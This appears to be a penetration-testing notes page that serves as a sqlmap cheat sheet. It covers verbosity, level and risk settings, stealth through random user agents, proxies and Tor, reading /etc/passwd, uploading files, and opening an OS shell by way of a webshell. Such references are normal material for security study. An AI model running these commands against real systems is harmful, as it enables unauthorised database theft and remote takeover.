sqlmap

Verbose Level (-v)

0: displays critical info only
1: displays warning info
2: displays debug info
3: displays payload used
4: displays HTTP request body
5: displays HTTP response headers
6: displays HTTP response body

Database Connection (-d)

Connect to a database with credential:

sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/<MySQL/Oracle/Microsoft SQL Server/PostgreSQL>

or connect to a database file:

sqlmap -d DBMS://<SQLite, Microsoft Access, Firebird>

GET (-u)

sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users

POST (--data)

sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users

Load Request from a File (-r)

sqlmap -r <request_from_burp>

sqlmap -u <url> --cookie <cookie>

User-Agent (--user-agent)

The default User-Agent header sent by sqlmap is sqlmap/1.0-dev-xxxxxxx, but we can specify an User-Agent header:

sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users

or set a random user agent:

sqlmap -u <url> --random-agent -f --banner --dbs --users

Level (--level)

--level=1: default mode
--level=2: adds cookie testing
--level=3: adds User-Agent testing
--level=4: more testing
--level=5: adds Host testing

Note that the use of the -p switch bypasses the level. This means that by manually setting the parameter to test, you can perform a more accurate, stealthy and in-depth exploitation.

Risk (--risk)

--risk=1: (Default) innocuous injections
--risk=2: Enables heavy time-based injections
--risk=3: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table

Proxy (--proxy) and Tor (--tor)

Proxy:

sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users

Tor:

sqlmap --tor -u <url> -f --banner --dbs --users

Blind SQLi (--string, --not-string)

Append to --string a string which is always present in True output page
Append to --not-string a string which is always present in False output page

Privilege Enumeration (--is-dba)

Determine if the current user is the database admin:

sqlmap -u <url> --is-dba

Download/Upload (--file-read/--file-write/--file-dest)

Download a file:

sqlmap -u <url> --file-read /etc/passwd

Uploads a file:

sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>

RCE (--os-shell)

The following requirements must be satisfied for --os-shell to work:

We have write permission
Pathnames are default
PHP magic_quotes_gpc is disabled

sqlmap -u <url> --os-shell

Behind the scene, sqlmap creates an "upload trojan" on the target machine and uploads a webshell from here.

If the -d option is used, sqlmap will use UDF. For example:

sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell

PreviousWebshell and UDF NextCode Review: Initialization

Last updated 3 years ago

hashtagVerbose Level (-v)

hashtagDatabase Connection (-d)

hashtagGET (-u)

hashtagPOST (--data)

hashtagLoad Request from a File (-r)

hashtagCookie (--cookie)

hashtagUser-Agent (--user-agent)

hashtagLevel (--level)

hashtagRisk (--risk)

hashtagProxy (--proxy) and Tor (--tor)

hashtagBlind SQLi (--string, --not-string)

hashtagPrivilege Enumeration (--is-dba)

hashtagDownload/Upload (--file-read/--file-write/--file-dest)

hashtagRCE (--os-shell)